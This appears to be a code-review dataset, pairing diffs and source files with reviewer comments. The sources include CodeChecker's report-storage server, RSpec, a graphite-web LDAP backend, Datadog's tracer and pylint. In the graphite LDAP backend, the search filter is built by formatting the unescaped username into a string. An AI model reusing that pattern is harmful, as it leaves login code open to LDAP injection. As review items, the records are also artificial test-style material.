the database.' raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.DATABASE, msg) @exc_to_thrift_reqfail @timeit def getMissingContentHashes(self, file_hashes): self.__require_store() with DBSession(self.__Session) as session: q = session.query(FileContent) \ .options(sqlalchemy.orm.load_only('content_hash')) \ .filter(FileContent.content_hash.in_(file_hashes)) return list(set(file_hashes) - set(map(lambda fc: fc.content_hash, q))) def __store_source_files(self, source_root, filename_to_hash, trim_path_prefixes): """ Storing file contents from plist. """ file_path_to_id = {} for file_name, file_hash in filename_to_hash.items(): source_file_name = os.path.join(source_root, file_name.strip("/")) source_file_name = os.path.realpath(source_file_name) LOG.debug("Storing source file: " + source_file_name) trimmed_file_path = util.trim_path_prefixes(file_name, trim_path_prefixes) if not os.path.isfile(source_file_name): # The file was not in the ZIP file, because we already # have the content. Let's check if we already have a file # record in the database or we need to add one. LOG.debug(file_name + ' not found or already stored.') fid = None with DBSession(self.__Session) as session: fid = store_handler.addFileRecord(session, trimmed_file_path, file_hash) if not fid: LOG.error("File ID for " + source_file_name + " is not found in the DB with " + "content hash " + file_hash + ". Missing from ZIP?") file_path_to_id[file_name] = fid LOG.debug(str(fid) + " fileid found") continue with codecs.open(source_file_name, 'r', 'UTF-8', 'replace') as source_file: file_content = source_file.read() file_content = codecs.encode(file_content, 'utf-8') with DBSession(self.__Session) as session: file_path_to_id[file_name] = \ store_handler.addFileContent(session, trimmed_file_path, file_content, file_hash, None) return file_path_to_id def __store_reports(self, session, report_dir, source_root, run_id, file_path_to_id, run_history_time, severity_map, wrong_src_code_comments, skip_handler): """ Parse up and store the plist report files. """ all_reports = session.query(Report) \ .filter(Report.run_id == run_id) \ .all() hash_map_reports = defaultdict(list) for report in all_reports: hash_map_reports[report.bug_id].append(report) already_added = set() new_bug_hashes = set() # Processing PList files. _, _, report_files = next(os.walk(report_dir), ([], [], [])) for f in report_files: if not f.endswith('.plist'): continue LOG.debug("Parsing input file '" + f + "'") try: files, reports = plist_parser.parse_plist( os.path.join(report_dir, f), source_root) except Exception as ex: LOG.error('Parsing the plist failed: ' + str(ex)) continue file_ids = {} for file_name in files: file_ids[file_name] = file_path_to_id[file_name] # Store report. for report in reports: source_file = files[report.main['location']['file']] if skip_handler.should_skip(source_file): continue bug_paths, bug_events = \ store_handler.collect_paths_events(report, file_ids, files) report_path_hash = get_report_path_hash(report, files) if report_path_hash in already_added: LOG.debug('Not storing report. Already added') LOG.debug(report) continue LOG.debug("Storing check results to the database.") LOG.debug("Storing report") bug_id = report.main[ 'issue_hash_content_of_line_in_context'] if bug_id in hash_map_reports: old_report = hash_map_reports[bug_id][0] old_status = old_report.detection_status detection_status = 'reopened' \ if old_status == 'resolved' else 'unresolved' else: detection_status = 'new' report_id = store_handler.addReport( session, run_id, file_ids[source_file], report.main, bug_paths, bug_events, detection_status, run_history_time if detection_status == 'new' else old_report.detected_at, severity_map) new_bug_hashes.add(bug_id) already_added.add(report_path_hash) last_report_event = report.bug_path[-1] file_name = files[last_report_event['location']['file']] source_file_name = os.path.realpath( os.path.join(source_root, file_name.strip("/"))) if os.path.isfile(source_file_name): sc_handler = SourceCodeCommentHandler(source_file_name) checker_name = report.main['check_name'] report_line = last_report_event['location']['line'] source_file = os.path.basename(file_name) src_comment_data = sc_handler.filter_source_line_comments( report_line, checker_name) if len(src_comment_data) == 1: status = src_comment_data[0]['status'] rw_status = ttypes.ReviewStatus.FALSE_POSITIVE if status == 'confirmed': rw_status = ttypes.ReviewStatus.CONFIRMED elif status == 'intentional': rw_status = ttypes.ReviewStatus.INTENTIONAL self._setReviewStatus(report_id, rw_status, src_comment_data[0]['message'], session) elif len(src_comment_data) > 1: LOG.warning( "Multiple source code comment can be found " "for '{0}' checker in '{1}' at line {2}. " "This bug will not be suppressed!".format( checker_name, source_file, report_line)) wrong_src_code = "{0}|{1}|{2}".format(source_file, report_line, checker_name) wrong_src_code_comments.append(wrong_src_code) LOG.debug("Storing done for report " + str(report_id)) reports_to_delete = set() for bug_hash, reports in hash_map_reports.items(): if bug_hash in new_bug_hashes: reports_to_delete.update(map(lambda x: x.id, reports)) else: for report in reports: # We set the fix date of a report only if the report # has not been fixed before. if report.fixed_at: continue report.detection_status = 'resolved' report.fixed_at = run_history_time if len(reports_to_delete) != 0: self.__removeReports(session, list(reports_to_delete)) @staticmethod @exc_to_thrift_reqfail def __store_run_lock(session, name, username): """ Store a RunLock record for the given run name into the database. """ # If the run can be stored, we need to lock it first. run_lock = session.query(RunLock) \ .filter(RunLock.name == name) \ .with_for_update(nowait=True).one_or_none() if not run_lock: # If there is no lock record for the given run name, the run # is not locked -- create a new lock. run_lock = RunLock(name, username) session.add(run_lock) elif run_lock.has_expired( db_cleanup.RUN_LOCK_TIMEOUT_IN_DATABASE): # There can be a lock in the database, which has already # expired. In this case, we assume that the previous operation # has failed, and thus, we can re-use the already present lock. run_lock.touch() run_lock.username = username else: # In case the lock exists and it has not expired, we must # consider the run a locked one. when = run_lock.when_expires( db_cleanup.RUN_LOCK_TIMEOUT_IN_DATABASE) username = run_lock.username if run_lock.username is not None \ else "another user" LOG.info("Refusing to store into run '{0}' as it is locked by " "{1}. Lock will expire at '{2}'." .format(name, username, when)) raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.DATABASE, "The run named '{0}' is being stored into by {1}. If the " "other store operation has failed, this lock will expire " "at '{2}'.".format(name, username, when)) # At any rate, if the lock has been created or updated, commit it # into the database. try: session.commit() except (sqlalchemy.exc.IntegrityError, sqlalchemy.orm.exc.StaleDataError): # The commit of this lock can fail. # # In case two store ops attempt to lock the same run name at the # same time, committing the lock in the transaction that commits # later will result in an IntegrityError due to the primary key # constraint. # # In case two store ops attempt to lock the same run name with # reuse and one of the operation hangs long enough before COMMIT # so that the other operation commits and thus removes the lock # record, StaleDataError is raised. In this case, also consider # the run locked, as the data changed while the transaction was # waiting, as another run wholly completed. LOG.info("Run '{0}' got locked while current transaction " "tried to acquire a lock. Considering run as locked." .format(name)) raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.DATABASE, "The run named '{0}' is being stored into by another " "user.".format(name)) @staticmethod @exc_to_thrift_reqfail def __free_run_lock(session, name): """ Remove the lock from the database for the given run name. """ # Using with_for_update() here so the database (in case it supports # this operation) locks the lock record's row from any other access. run_lock = session.query(RunLock) \ .filter(RunLock.name == name) \ .with_for_update(nowait=True).one() session.delete(run_lock) session.commit() def __check_run_limit(self, run_name): """ Checks the maximum allowed of uploadable runs for the current product. """ max_run_count = self.__manager.get_max_run_count() with DBSession(self.__config_database) as session: product = session.query(Product).get(self.__product.id) if product.run_limit: max_run_count = product.run_limit # Session that handles constraints on the run. with DBSession(self.__Session) as session: if max_run_count: LOG.debug("Check the maximum number of allowed runs which is " "{0}".format(max_run_count)) run = session.query(Run) \ .filter(Run.name == run_name) \ .one_or_none() # If max_run_count is not set in the config file, it will allow # the user to upload unlimited runs. run_count = session.query(Run.id).count() # If we are not updating a run or the run count is reached the # limit it will throw an exception. if not run and run_count >= max_run_count: remove_run_count = run_count - max_run_count + 1 raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.GENERAL, 'You reached the maximum number of allowed runs ' '({0}/{1})! Please remove at least {2} run(s) before ' 'you try it again.'.format(run_count, max_run_count, remove_run_count)) @exc_to_thrift_reqfail @timeit def massStoreRun(self, name, tag, version, b64zip, force, trim_path_prefixes): self.__require_store() user = self.__auth_session.user if self.__auth_session else None # Check constraints of the run. self.__check_run_limit(name) with DBSession(self.__Session) as session: ThriftRequestHandler.__store_run_lock(session, name, user) context = generic_package_context.get_context() wrong_src_code_comments = [] try: with util.TemporaryDirectory() as zip_dir: unzip(b64zip, zip_dir) LOG.debug("Using unzipped folder '{0}'".format(zip_dir)) source_root = os.path.join(zip_dir, 'root') report_dir = os.path.join(zip_dir, 'reports') metadata_file = os.path.join(report_dir, 'metadata.json') skip_file = os.path.join(report_dir, 'skip_file') content_hash_file = os.path.join(zip_dir, 'content_hashes.json') skip_handler = skiplist_handler.SkipListHandler() if os.path.exists(skip_file): LOG.debug("Pocessing skip file %s", skip_file) try: with open(skip_file) as sf: skip_handler = \ skiplist_handler.SkipListHandler(sf.read()) except (IOError, OSError) as err: LOG.error("Failed to open skip file") LOG.error(err) filename_to_hash = util.load_json_or_empty(content_hash_file, {}) file_path_to_id = self.__store_source_files(source_root, filename_to_hash, trim_path_prefixes) run_history_time = datetime.now() check_commands, check_durations, cc_version, statistics = \ store_handler.metadata_info(metadata_file) if len(check_commands) == 0: command = ' '.join(sys.argv) elif len(check_commands) == 1: command = ' '.join(check_commands[0]) else: command = "multiple analyze calls: " + \ '; '.join([' '.join(com) for com in check_commands]) durations = 0 if len(check_durations) > 0: # Round the duration to seconds. durations = int(sum(check_durations)) # This session's transaction buffer stores the actual run data # into the database. with DBSession(self.__Session) as session: # Load the lock record for "FOR UPDATE" so that the # transaction that handles the run's store operations # has a lock on the database row itself. run_lock = session.query(RunLock) \ .filter(RunLock.name == name) \ .with_for_update(nowait=True).one() # Do not remove this seemingly dummy print, we need to make # sure that the execution of the SQL statement is not # optimised away and the fetched row is not garbage # collected. LOG.debug("Storing into run '{0}' locked at '{1}'." .format(name, run_lock.locked_at)) # Actual store operation begins here. run_id = store_handler.addCheckerRun(session, command, name, tag, user if user else 'Anonymous', run_history_time, version, force, cc_version, statistics) self.__store_reports(session, report_dir, source_root, run_id, file_path_to_id, run_history_time, context.severity_map, wrong_src_code_comments, skip_handler) store_handler.setRunDuration(session, run_id, durations) store_handler.finishCheckerRun(session, run_id) session.commit() return run_id finally: # In any case if the "try" block's execution began, a run lock must # exist, which can now be removed, as storage either completed # successfully, or failed in a detectable manner. # (If the failure is undetectable, the coded grace period expiry # of the lock will allow further store operations to the given # run name.) with DBSession(self.__Session) as session: ThriftRequestHandler.__free_run_lock(session, name) if len(wrong_src_code_comments): raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.SOURCE_FILE, "Multiple source code comment can be found with the same " "checker name for same bug!", wrong_src_code_comments) @exc_to_thrift_reqfail @timeit def allowsStoringAnalysisStatistics(self): self.__require_store() return True if self.__manager.get_analysis_statistics_dir() else False @exc_to_thrift_reqfail @timeit def getAnalysisStatisticsLimits(self): self.__require_store() cfg = dict() # Get the limit of failure zip size. failure_zip_size = self.__manager.get_failure_zip_size() if failure_zip_size: cfg[ttypes.StoreLimitKind.FAILURE_ZIP_SIZE] = failure_zip_size # Get the limit of compilation database size. compilation_database_size = \ self.__manager.get_compilation_database_size() if compilation_database_size: cfg[ttypes.StoreLimitKind.COMPILATION_DATABASE_SIZE] = \ compilation_database_size return cfg @exc_to_thrift_reqfail @timeit def storeAnalysisStatistics(self, run_name, b64zip): self.__require_store() report_dir_store = self.__manager.get_analysis_statistics_dir() if report_dir_store: try: product_dir = os.path.join(report_dir_store, self.__product.endpoint) # Create report store directory. if not os.path.exists(product_dir): os.makedirs(product_dir) # Removes and replaces special characters in the run name. run_name = slugify(run_name) run_zip_file = os.path.join(product_dir, run_name + '.zip') with open(run_zip_file, 'w') as run_zip: run_zip.write(zlib.decompress( base64.b64decode(b64zip))) return True except Exception as ex: LOG.error(str(ex)) return False return False
1
9,789
Shouldn't we use store a message which indicates that there was no available checker command? By the way how is it possible that metadata.json doesn't contain the checker command? Maybe this was the case in the earlier versions?
Ericsson-codechecker
c
@@ -32,6 +32,10 @@ module RSpec @exclusion_patterns = true_or_false ? [] : DEFAULT_EXCLUSION_PATTERNS.dup end + def full_backtrace + @exclusion_patterns.empty? + end + private def matches_an_exclusion_pattern?(line)
1
module RSpec module Core class BacktraceCleaner DEFAULT_EXCLUSION_PATTERNS = [ /\/lib\d*\/ruby\//, /org\/jruby\//, /bin\//, %r|/gems/|, /spec\/spec_helper\.rb/, /lib\/rspec\/(core|expectations|matchers|mocks)/ ] attr_accessor :inclusion_patterns attr_accessor :exclusion_patterns def initialize(inclusion_patterns=nil, exclusion_patterns=DEFAULT_EXCLUSION_PATTERNS.dup) @exclusion_patterns = exclusion_patterns if inclusion_patterns.nil? @inclusion_patterns = (matches_an_exclusion_pattern? Dir.getwd) ? [Regexp.new(Dir.getwd)] : [] else @inclusion_patterns = inclusion_patterns end end def exclude?(line) @inclusion_patterns.none? {|p| line =~ p} and matches_an_exclusion_pattern?(line) end def full_backtrace=(true_or_false) @exclusion_patterns = true_or_false ? [] : DEFAULT_EXCLUSION_PATTERNS.dup end private def matches_an_exclusion_pattern?(line) @exclusion_patterns.any? {|p| line =~ p} end end end end
1
8,747
Given that this is a boolean predicate, maybe it should be `full_backtrace?`.
rspec-rspec-core
rb
@@ -12,7 +12,9 @@ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.""" -import ldap, traceback +import traceback + +import ldap from django.conf import settings from django.contrib.auth.models import User
1
"""Copyright 2008 Orbitz WorldWide Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.""" import ldap, traceback from django.conf import settings from django.contrib.auth.models import User class LDAPBackend: def authenticate(self, username=None, password=None): if settings.LDAP_USER_DN_TEMPLATE is not None: settings.LDAP_BASE_USER = settings.LDAP_USER_DN_TEMPLATE % {'username': username} settings.LDAP_BASE_PASS = password try: conn = ldap.initialize(settings.LDAP_URI) conn.protocol_version = ldap.VERSION3 if settings.LDAP_USE_TLS: conn.start_tls_s() conn.simple_bind_s( settings.LDAP_BASE_USER, settings.LDAP_BASE_PASS ) except ldap.LDAPError: traceback.print_exc() return None scope = ldap.SCOPE_SUBTREE filter = settings.LDAP_USER_QUERY % username returnFields = ['dn','mail'] try: resultID = conn.search( settings.LDAP_SEARCH_BASE, scope, filter, returnFields ) resultType, resultData = conn.result( resultID, 0 ) if len(resultData) != 1: # User does not exist return None userDN = resultData[0][0] try: userMail = resultData[0][1]['mail'][0].decode("utf-8") except Exception: userMail = "Unknown" conn.simple_bind_s(userDN,password) try: user = User.objects.get(username=username) except Exception: # First time login, not in django's database # To prevent login from django db user randomPasswd = User.objects.make_random_password(length=16) user = User.objects.create_user(username, userMail, randomPasswd) user.save() return user except ldap.INVALID_CREDENTIALS: traceback.print_exc() return None def get_user(self,user_id): try: return User.objects.get(pk=user_id) except User.DoesNotExist: return None
1
12,769
Just curious why the blank line here?
graphite-project-graphite-web
py
@@ -1,3 +1,3 @@ from __future__ import (absolute_import, print_function, division) -from netlib.version import * +from mitmproxy.version import *
1
from __future__ import (absolute_import, print_function, division) from netlib.version import *
1
11,420
I like the idea, but we don't want a dependency on mitmproxy in pathod.
mitmproxy-mitmproxy
py
@@ -49,6 +49,16 @@ namespace Datadog.Trace private TimeSpan Elapsed => StopwatchHelpers.GetElapsed(Stopwatch.GetTimestamp() - _timestamp); + /// <summary> + /// Gets or sets a collection of propagated internal Datadog tags, + /// formatted as "key1=value1,key2=value2". + /// </summary> + /// <remarks> + /// We're keeping this as the string representation to avoid having to parse. + /// For now, it's relatively easy to append new values when needed. + /// </remarks> + public string DatadogTags { get; set; } + public void AddSpan(Span span) { lock (this)
1
// <copyright file="TraceContext.cs" company="Datadog"> // Unless explicitly stated otherwise all files in this repository are licensed under the Apache 2 License. // This product includes software developed at Datadog (https://www.datadoghq.com/). Copyright 2017 Datadog, Inc. // </copyright> using System; using System.Diagnostics; using Datadog.Trace.ClrProfiler; using Datadog.Trace.Logging; using Datadog.Trace.PlatformHelpers; using Datadog.Trace.Tagging; using Datadog.Trace.Util; namespace Datadog.Trace { internal class TraceContext { private static readonly IDatadogLogger Log = DatadogLogging.GetLoggerFor<TraceContext>(); private readonly DateTimeOffset _utcStart = DateTimeOffset.UtcNow; private readonly long _timestamp = Stopwatch.GetTimestamp(); private ArrayBuilder<Span> _spans; private int _openSpans; private SamplingPriority? _samplingPriority; public TraceContext(IDatadogTracer tracer) { Tracer = tracer; } public Span RootSpan { get; private set; } public DateTimeOffset UtcNow => _utcStart.Add(Elapsed); public IDatadogTracer Tracer { get; } /// <summary> /// Gets or sets sampling priority. /// </summary> public SamplingPriority? SamplingPriority { get => _samplingPriority; set { SetSamplingPriority(value); } } private TimeSpan Elapsed => StopwatchHelpers.GetElapsed(Stopwatch.GetTimestamp() - _timestamp); public void AddSpan(Span span) { lock (this) { if (RootSpan == null) { // first span added is the root span RootSpan = span; DecorateRootSpan(span); if (_samplingPriority == null) { if (span.Context.Parent is SpanContext context && context.SamplingPriority != null) { // this is a root span created from a propagated context that contains a sampling priority. // lock sampling priority when a span is started from a propagated trace. _samplingPriority = context.SamplingPriority; } else { // this is a local root span (i.e. not propagated). // determine an initial sampling priority for this trace, but don't lock it yet _samplingPriority = Tracer.Sampler?.GetSamplingPriority(RootSpan); } } } _openSpans++; } } public void CloseSpan(Span span) { bool ShouldTriggerPartialFlush() => Tracer.Settings.Exporter.PartialFlushEnabled && _spans.Count >= Tracer.Settings.Exporter.PartialFlushMinSpans; if (span == RootSpan) { if (_samplingPriority == null) { Log.Warning("Cannot set span metric for sampling priority before it has been set."); } else { SetSamplingPriority(span, _samplingPriority.Value); } } ArraySegment<Span> spansToWrite = default; bool shouldPropagateMetadata = false; lock (this) { _spans.Add(span); _openSpans--; if (_openSpans == 0) { spansToWrite = _spans.GetArray(); _spans = default; } else if (ShouldTriggerPartialFlush()) { Log.Debug<ulong, ulong, int>( "Closing span {spanId} triggered a partial flush of trace {traceId} with {spanCount} pending spans", span.SpanId, span.TraceId, _spans.Count); // We may not be sending the root span, so we need to propagate the metadata to other spans of the partial trace // There's no point in doing that inside of the lock, so we set a flag for later shouldPropagateMetadata = true; spansToWrite = _spans.GetArray(); // Making the assumption that, if the number of closed spans was big enough to trigger partial flush, // the number of remaining spans is probably big as well. // Therefore, we bypass the resize logic and immediately allocate the array to its maximum size _spans = new ArrayBuilder<Span>(spansToWrite.Count); } } if (shouldPropagateMetadata) { PropagateMetadata(spansToWrite); } if (spansToWrite.Count > 0) { Tracer.Write(spansToWrite); } } public void SetSamplingPriority(SamplingPriority? samplingPriority, bool notifyDistributedTracer = true) { _samplingPriority = samplingPriority; if (notifyDistributedTracer) { DistributedTracer.Instance.SetSamplingPriority(samplingPriority); } } public TimeSpan ElapsedSince(DateTimeOffset date) { return Elapsed + (_utcStart - date); } private static void SetSamplingPriority(Span span, SamplingPriority samplingPriority) { if (span.Tags is CommonTags tags) { tags.SamplingPriority = (int)samplingPriority; } else { span.Tags.SetMetric(Metrics.SamplingPriority, (int)samplingPriority); } } private void PropagateMetadata(ArraySegment<Span> spans) { // The agent looks for the sampling priority on the first span that has no parent // Finding those spans is not trivial, so instead we apply the priority to every span var samplingPriority = _samplingPriority; if (samplingPriority == null) { return; } // Using a for loop to avoid the boxing allocation on ArraySegment.GetEnumerator for (int i = 0; i < spans.Count; i++) { SetSamplingPriority(spans.Array[i + spans.Offset], samplingPriority.Value); } } private void DecorateRootSpan(Span span) { if (AzureAppServices.Metadata.IsRelevant) { span.SetTag(Tags.AzureAppServicesSiteName, AzureAppServices.Metadata.SiteName); span.SetTag(Tags.AzureAppServicesSiteKind, AzureAppServices.Metadata.SiteKind); span.SetTag(Tags.AzureAppServicesSiteType, AzureAppServices.Metadata.SiteType); span.SetTag(Tags.AzureAppServicesResourceGroup, AzureAppServices.Metadata.ResourceGroup); span.SetTag(Tags.AzureAppServicesSubscriptionId, AzureAppServices.Metadata.SubscriptionId); span.SetTag(Tags.AzureAppServicesResourceId, AzureAppServices.Metadata.ResourceId); span.SetTag(Tags.AzureAppServicesInstanceId, AzureAppServices.Metadata.InstanceId); span.SetTag(Tags.AzureAppServicesInstanceName, AzureAppServices.Metadata.InstanceName); span.SetTag(Tags.AzureAppServicesOperatingSystem, AzureAppServices.Metadata.OperatingSystem); span.SetTag(Tags.AzureAppServicesRuntime, AzureAppServices.Metadata.Runtime); span.SetTag(Tags.AzureAppServicesExtensionVersion, AzureAppServices.Metadata.SiteExtensionVersion); } } } }
1
25,136
Why not adding this to the interface and keep passing the interface (as the interface is internal I don't get why you're not adding it there)
DataDog-dd-trace-dotnet
.cs
@@ -70,6 +70,7 @@ from typing import Pattern, Tuple import astroid from astroid import nodes +from astroid.const import PY310_PLUS from pylint.checkers import BaseChecker, utils from pylint.checkers.utils import (
1
# Copyright (c) 2006-2014 LOGILAB S.A. (Paris, FRANCE) <[email protected]> # Copyright (c) 2009 James Lingard <[email protected]> # Copyright (c) 2012-2014 Google, Inc. # Copyright (c) 2014-2020 Claudiu Popa <[email protected]> # Copyright (c) 2014 David Shea <[email protected]> # Copyright (c) 2014 Steven Myint <[email protected]> # Copyright (c) 2014 Holger Peters <[email protected]> # Copyright (c) 2014 Arun Persaud <[email protected]> # Copyright (c) 2015 Anentropic <[email protected]> # Copyright (c) 2015 Dmitry Pribysh <[email protected]> # Copyright (c) 2015 Rene Zhang <[email protected]> # Copyright (c) 2015 Radu Ciorba <[email protected]> # Copyright (c) 2015 Ionel Cristian Maries <[email protected]> # Copyright (c) 2016, 2019 Ashley Whetter <[email protected]> # Copyright (c) 2016 Alexander Todorov <[email protected]> # Copyright (c) 2016 Jürgen Hermann <[email protected]> # Copyright (c) 2016 Jakub Wilk <[email protected]> # Copyright (c) 2016 Filipe Brandenburger <[email protected]> # Copyright (c) 2017-2018, 2020 hippo91 <[email protected]> # Copyright (c) 2017 Łukasz Rogalski <[email protected]> # Copyright (c) 2017 Derek Gustafson <[email protected]> # Copyright (c) 2017 Ville Skyttä <[email protected]> # Copyright (c) 2018-2019 Nick Drozd <[email protected]> # Copyright (c) 2018 Pablo Galindo <[email protected]> # Copyright (c) 2018 Jim Robertson <[email protected]> # Copyright (c) 2018 Lucas Cimon <[email protected]> # Copyright (c) 2018 Mike Frysinger <[email protected]> # Copyright (c) 2018 Ben Green <[email protected]> # Copyright (c) 2018 Konstantin <[email protected]> # Copyright (c) 2018 Justin Li <[email protected]> # Copyright (c) 2018 Bryce Guinta <[email protected]> # Copyright (c) 2019-2021 Pierre Sassoulas <[email protected]> # Copyright (c) 2019 Andy Palmer <[email protected]> # Copyright (c) 2019 mattlbeck <[email protected]> # Copyright (c) 2019 Martin Vielsmaier <[email protected]> # Copyright (c) 2019 Santiago Castro <[email protected]> # Copyright (c) 2019 yory8 <[email protected]> # Copyright (c) 2019 Federico Bond <[email protected]> # Copyright (c) 2019 Pascal Corpet <[email protected]> # Copyright (c) 2020 Peter Kolbus <[email protected]> # Copyright (c) 2020 Julien Palard <[email protected]> # Copyright (c) 2020 Ram Rachum <[email protected]> # Copyright (c) 2020 Anthony Sottile <[email protected]> # Copyright (c) 2020 Anubhav <[email protected]> # Copyright (c) 2021 doranid <[email protected]> # Copyright (c) 2021 Marc Mueller <[email protected]> # Copyright (c) 2021 yushao2 <[email protected]> # Copyright (c) 2021 Andrew Haigh <[email protected]> # Copyright (c) 2021 Jens H. Nielsen <[email protected]> # Copyright (c) 2021 Ikraduya Edian <[email protected]> # Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html # For details: https://github.com/PyCQA/pylint/blob/main/LICENSE """try to find more bugs in the code using astroid inference capabilities """ import fnmatch import heapq import itertools import operator import re import shlex import sys import types from collections import deque from collections.abc import Sequence from functools import singledispatch from typing import Pattern, Tuple import astroid from astroid import nodes from pylint.checkers import BaseChecker, utils from pylint.checkers.utils import ( check_messages, decorated_with, decorated_with_property, has_known_bases, is_builtin_object, is_classdef_type, is_comprehension, is_inside_abstract_class, is_iterable, is_mapping, is_overload_stub, is_postponed_evaluation_enabled, is_super, node_ignores_exception, safe_infer, supports_delitem, supports_getitem, supports_membership_test, supports_setitem, ) from pylint.constants import BUILTINS, PY310_PLUS from pylint.interfaces import INFERENCE, IAstroidChecker from pylint.utils import get_global_option STR_FORMAT = {"%s.str.format" % BUILTINS} ASYNCIO_COROUTINE = "asyncio.coroutines.coroutine" BUILTIN_TUPLE = "builtins.tuple" TYPE_ANNOTATION_NODES_TYPES = ( nodes.AnnAssign, nodes.Arguments, nodes.FunctionDef, ) def _unflatten(iterable): for index, elem in enumerate(iterable): if isinstance(elem, Sequence) and not isinstance(elem, str): yield from _unflatten(elem) elif elem and not index: # We're interested only in the first element. yield elem def _flatten_container(iterable): # Flatten nested containers into a single iterable for item in iterable: if isinstance(item, (list, tuple, types.GeneratorType)): yield from _flatten_container(item) else: yield item def _is_owner_ignored(owner, attrname, ignored_classes, ignored_modules): """Check if the given owner should be ignored This will verify if the owner's module is in *ignored_modules* or the owner's module fully qualified name is in *ignored_modules* or if the *ignored_modules* contains a pattern which catches the fully qualified name of the module. Also, similar checks are done for the owner itself, if its name matches any name from the *ignored_classes* or if its qualified name can be found in *ignored_classes*. """ ignored_modules = set(ignored_modules) module_name = owner.root().name module_qname = owner.root().qname() for ignore in ignored_modules: # Try to match the module name / fully qualified name directly if module_qname in ignored_modules or module_name in ignored_modules: return True # Try to see if the ignores pattern match against the module name. if fnmatch.fnmatch(module_qname, ignore): return True # Otherwise we might have a root module name being ignored, # and the qualified owner has more levels of depth. parts = deque(module_name.split(".")) current_module = "" while parts: part = parts.popleft() if not current_module: current_module = part else: current_module += f".{part}" if current_module in ignored_modules: return True # Match against ignored classes. ignored_classes = set(ignored_classes) if hasattr(owner, "qname"): qname = owner.qname() else: qname = "" return any(ignore in (attrname, qname) for ignore in ignored_classes) @singledispatch def _node_names(node): if not hasattr(node, "locals"): return [] return node.locals.keys() @_node_names.register(nodes.ClassDef) @_node_names.register(astroid.Instance) def _(node): values = itertools.chain(node.instance_attrs.keys(), node.locals.keys()) try: mro = node.mro()[1:] except (NotImplementedError, TypeError, astroid.MroError): mro = node.ancestors() other_values = [value for cls in mro for value in _node_names(cls)] return itertools.chain(values, other_values) def _string_distance(seq1, seq2): seq2_length = len(seq2) row = list(range(1, seq2_length + 1)) + [0] for seq1_index, seq1_char in enumerate(seq1): last_row = row row = [0] * seq2_length + [seq1_index + 1] for seq2_index, seq2_char in enumerate(seq2): row[seq2_index] = min( last_row[seq2_index] + 1, row[seq2_index - 1] + 1, last_row[seq2_index - 1] + (seq1_char != seq2_char), ) return row[seq2_length - 1] def _similar_names(owner, attrname, distance_threshold, max_choices): """Given an owner and a name, try to find similar names The similar names are searched given a distance metric and only a given number of choices will be returned. """ possible_names = [] names = _node_names(owner) for name in names: if name == attrname: continue distance = _string_distance(attrname, name) if distance <= distance_threshold: possible_names.append((name, distance)) # Now get back the values with a minimum, up to the given # limit or choices. picked = [ name for (name, _) in heapq.nsmallest( max_choices, possible_names, key=operator.itemgetter(1) ) ] return sorted(picked) def _missing_member_hint(owner, attrname, distance_threshold, max_choices): names = _similar_names(owner, attrname, distance_threshold, max_choices) if not names: # No similar name. return "" names = [repr(name) for name in names] if len(names) == 1: names = ", ".join(names) else: names = "one of {} or {}".format(", ".join(names[:-1]), names[-1]) return f"; maybe {names}?" MSGS = { "E1101": ( "%s %r has no %r member%s", "no-member", "Used when a variable is accessed for an unexistent member.", {"old_names": [("E1103", "maybe-no-member")]}, ), "I1101": ( "%s %r has no %r member%s, but source is unavailable. Consider " "adding this module to extension-pkg-allow-list if you want " "to perform analysis based on run-time introspection of living objects.", "c-extension-no-member", "Used when a variable is accessed for non-existent member of C " "extension. Due to unavailability of source static analysis is impossible, " "but it may be performed by introspecting living objects in run-time.", ), "E1102": ( "%s is not callable", "not-callable", "Used when an object being called has been inferred to a non " "callable object.", ), "E1111": ( "Assigning result of a function call, where the function has no return", "assignment-from-no-return", "Used when an assignment is done on a function call but the " "inferred function doesn't return anything.", ), "E1120": ( "No value for argument %s in %s call", "no-value-for-parameter", "Used when a function call passes too few arguments.", ), "E1121": ( "Too many positional arguments for %s call", "too-many-function-args", "Used when a function call passes too many positional arguments.", ), "E1123": ( "Unexpected keyword argument %r in %s call", "unexpected-keyword-arg", "Used when a function call passes a keyword argument that " "doesn't correspond to one of the function's parameter names.", ), "E1124": ( "Argument %r passed by position and keyword in %s call", "redundant-keyword-arg", "Used when a function call would result in assigning multiple " "values to a function parameter, one value from a positional " "argument and one from a keyword argument.", ), "E1125": ( "Missing mandatory keyword argument %r in %s call", "missing-kwoa", ( "Used when a function call does not pass a mandatory" " keyword-only argument." ), ), "E1126": ( "Sequence index is not an int, slice, or instance with __index__", "invalid-sequence-index", "Used when a sequence type is indexed with an invalid type. " "Valid types are ints, slices, and objects with an __index__ " "method.", ), "E1127": ( "Slice index is not an int, None, or instance with __index__", "invalid-slice-index", "Used when a slice index is not an integer, None, or an object " "with an __index__ method.", ), "E1128": ( "Assigning result of a function call, where the function returns None", "assignment-from-none", "Used when an assignment is done on a function call but the " "inferred function returns nothing but None.", {"old_names": [("W1111", "old-assignment-from-none")]}, ), "E1129": ( "Context manager '%s' doesn't implement __enter__ and __exit__.", "not-context-manager", "Used when an instance in a with statement doesn't implement " "the context manager protocol(__enter__/__exit__).", ), "E1130": ( "%s", "invalid-unary-operand-type", "Emitted when a unary operand is used on an object which does not " "support this type of operation.", ), "E1131": ( "%s", "unsupported-binary-operation", "Emitted when a binary arithmetic operation between two " "operands is not supported.", ), "E1132": ( "Got multiple values for keyword argument %r in function call", "repeated-keyword", "Emitted when a function call got multiple values for a keyword.", ), "E1135": ( "Value '%s' doesn't support membership test", "unsupported-membership-test", "Emitted when an instance in membership test expression doesn't " "implement membership protocol (__contains__/__iter__/__getitem__).", ), "E1136": ( "Value '%s' is unsubscriptable", "unsubscriptable-object", "Emitted when a subscripted value doesn't support subscription " "(i.e. doesn't define __getitem__ method or __class_getitem__ for a class).", ), "E1137": ( "%r does not support item assignment", 